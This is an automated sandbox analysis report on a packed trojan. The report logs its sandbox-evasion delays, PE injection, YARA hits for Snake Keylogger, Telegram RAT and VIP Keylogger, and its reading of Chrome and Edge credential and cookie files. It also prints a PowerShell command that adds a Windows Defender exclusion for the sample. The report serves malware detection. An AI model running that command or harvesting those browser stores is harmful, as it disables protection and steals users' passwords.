Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596909	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596657	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596157	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 595001	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594876	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594751	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594626	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594501	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594376	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594251	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594126	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 594001	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 593876	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Thread delayed: delay time: 593751	Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849790363.0000000001457000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.00000000044B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Code function: 5_2_06DB9548 LdrInitializeThunk,LdrInitializeThunk,

5_2_06DB9548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

